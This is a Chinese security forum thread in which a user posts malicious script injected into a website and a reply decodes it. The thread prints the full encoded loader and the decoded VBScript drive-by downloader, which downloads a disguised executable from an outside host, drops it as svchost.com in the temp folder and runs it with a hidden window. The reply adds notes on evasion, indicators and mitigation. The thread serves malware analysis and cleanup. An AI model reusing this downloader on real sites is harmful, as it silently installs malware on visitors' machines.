瑞星卡卡安全论坛技术交流区系统软件 有个论坛,被写入这个恶意代码,谁帮我看一下!


有个论坛,被写入这个恶意代码,谁帮我看一下!

有个论坛,被写入这个恶意代码,谁帮我看一下!

这个论坛的程序文件被注入这个恶意代码以后,只要进去就跳出病毒警告,IE无法使用,谁帮我看看这个代码是什么意思,代码如下:
// Stage-1 loader as found injected in the forum's page files. The VBScript payload is stored
// escape()-encoded in Words and only materialised at runtime through unescape() + document.write,
// so a plain-text scan of the page source never sees "<script", "CreateObject" or the CLSID.
// Indicator for cleanup: any `document.write(unescape(` with a long %XX-encoded string in files
// that should not contain script. The decoded form is shown further down the thread.
var Words="  %3Cscript language%3D%22VBScript%22%3E%0D%0A  on error resume next%0D%0A  z3%3D%22ob%22%0D%0A  z4%3D%22ject%22%0D%0A  str6%3Dz3%26z4%0D%0A  z1%3D%22cla%22%0D%0A  z2%3D%22ssid%22%0D%0A  str7%3Dz1%26z2%0D%0A  c0%3D%22cl%22%0D%0A  c1%3D%22sid%3ABD96C556%2D%22%0D%0A  c2%3D%2265A3%2D11D0%2D983A%2D%22%0D%0A  c3%3D%2200C04FC29E36%22%0D%0A  str8%3Dc0%26c1%26c2%26c3%0D%0A  str9%3Dstr8%0D%0A  Set dfile %3D document%2EcreateElement%28str6%29%0D%0A  dfile%2EsetAttribute str7%2C str9%0D%0A  d1%3D%22Micros%22%0D%0A  d2%3D%22oft%2E%22%0D%0A  d3%3D%22XMLH%22%0D%0A  d4%3D%22TTP%22%0D%0A  str10%3Dd1%26d2%26d3%26d4%0D%0A  str11%3Dstr10%0D%0A  Set http %3D dfile%2ECreateObject%28str11%2C%22%22%29%0D%0A  a1%3D%22Ad%22%0D%0A  a2%3D%22odb%2E%22%0D%0A  a3%3D%22Str%22%0D%0A  a4%3D%22eam%22%0D%0A  str1%3Da1%26a2%26a3%26a4%0D%0A  str5%3Dstr1%0D%0A  set strm %3D dfile%2Ecreateobject%28str5%2C%22%22%29%0D%0A  strm%2Etype %3D 1%0D%0A  http%2EOpen %22GET%22%2C %22http%3A%2F%2Fwww%2Euxiu%2Enet%2Fad%2Fimages%2F1%2Flogin%2Ejpg%22%2C False%0D%0A  http%2ESend%0D%0A  set fso %3D dfile%2Ecreateobject%28%22Scripting%2EFileSystemObject%22%2C%22%22%29%0D%0A  set temp %3D fso%2EGetSpecialFolder%282%29 %0D%0A  filename%3D fso%2EBuildPath%28temp%2C%22svchost%2Ecom%22%29%0D%0A  strm%2Eopen%0D%0A  strm%2Ewrite http%2EresponseBody%0D%0A  strm%2Esavetofile filename%2C2%0D%0A  strm%2Eclose%0D%0A  b1%3D%22She%22%0D%0A  b2%3D%22ll%2E%22%0D%0A  b3%3D%22Applic%22%0D%0A  b4%3D%22ation%22%0D%0A  str2%3Db1%26b2%26b3%26b4%0D%0A  str3%3Dstr2%0D%0A  set exc %3D dfile%2Ecreateobject%28str3%2C%22%22%29%0D%0A  str4%3D%22open%22%0D%0A  exc%2EShellExecute filename%2C%22%22%2C%22%22%2Cstr4%2C0%0D%0A  %3C%2Fscript%3E%0D%0A%0D%0A";document.write(unescape(Words))
最后编辑2006-09-30 15:14:28
 

变量Words的值用escape()编码了

用unescape()解码后如下:

<script language="VBScript">
' Analyst annotation: decoded stage 2 of the injected code. It is a drive-by
' downloader: fetch a remote file, drop it in the user's temp folder, run it,
' all without user interaction. No memory corruption is involved; everything
' hinges on one ActiveX control that hands arbitrary COM objects to script.
on error resume next
' Every runtime error is suppressed, so a missing/kill-bitted control, a blocked
' download or a failed write leaves no visible trace in the browser.
z3="ob"
z4="ject"
str6=z3&z4
' Strings are split and re-joined at runtime ("ob"&"ject" -> "object",
' "cla"&"ssid" -> "classid", the CLSID pieces below) so a signature that looks
' for the literal tokens in the page source does not match.
z1="cla"
z2="ssid"
str7=z1&z2
c0="cl"
c1="sid:BD96C556-"
c2="65A3-11D0-983A-"
c3="00C04FC29E36"
str8=c0&c1&c2&c3
str9=str8
' str9 = "clsid:BD96C556-65A3-11D0-983A-00C04FC29E36". This is the CLSID of the
' RDS.DataSpace control shipped with MDAC; its CreateObject method was the
' well-known way to instantiate arbitrary COM objects from Internet-zone script
' (addressed by a Microsoft update in 2006). A kill bit for this CLSID, or an
' up-to-date MDAC, neutralises the whole script.
Set dfile = document.createElement(str6)
dfile.setAttribute str7, str9
' The <object classid="clsid:..."> element is built in the DOM rather than
' written in the page, for the same evasion reason as the string splitting.
d1="Micros"
d2="oft."
d3="XMLH"
d4="TTP"
str10=d1&d2&d3&d4
str11=str10
Set http = dfile.CreateObject(str11,"")
' http = Microsoft.XMLHTTP, obtained through RDS.DataSpace rather than the
' script engine's CreateObject, so the browser's safe-for-scripting check is
' not applied to the objects created below.
a1="Ad"
a2="odb."
a3="Str"
a4="eam"
str1=a1&a2&a3&a4
str5=str1
set strm = dfile.createobject(str5,"")
strm.type = 1
' strm = ADODB.Stream; type 1 is adTypeBinary, i.e. the response is handled as
' raw bytes. Given that the file is executed later, the "jpg" is presumably an
' executable with a misleading extension rather than an image.
http.Open "GET", "hxxp://www.uxiu.net/ad/images/1/login.jpg", False
http.Send
' Synchronous (False) download of the payload. Network indicator: a browser
' GET for this URL; the image-like path is meant to blend into normal traffic.
set fso = dfile.createobject("Scripting.FileSystemObject","")
set temp = fso.GetSpecialFolder(2)
filename= fso.BuildPath(temp,"svchost.com")
' GetSpecialFolder(2) is the TemporaryFolder, so filename is %TEMP%\svchost.com.
' The name mimics the legitimate svchost.exe; a .com file is still executable.
' Host indicator: svchost.com appearing in a user's temp directory.
strm.open
strm.write http.responseBody
strm.savetofile filename,2
strm.close
' savetofile mode 2 (adSaveCreateOverWrite) silently replaces an existing file.
b1="She"
b2="ll."
b3="Applic"
b4="ation"
str2=b1&b2&b3&b4
str3=str2
set exc = dfile.createobject(str3,"")
str4="open"
exc.ShellExecute filename,"","",str4,0
' exc = Shell.Application; ShellExecute with verb "open" and show state 0 runs
' the dropped file with a hidden window, so the victim sees nothing.
' Mitigation: patch MDAC / set the kill bit for the CLSID, restrict ActiveX in
' the Internet zone, and remove the document.write loader from the forum files.
</script>


其功能为:利用 Microsoft.XMLHTTP 下载 hxxp://www.uxiu.net/ad/images/1/login.jpg,借助 ADODB.Stream 和 Scripting.FileSystemObject 将其保存为 %temp%\svchost.com,再利用 Shell.Application 对象的 ShellExecute 方法运行它。

这是近期使用得最多的一种网站挂马的方法
 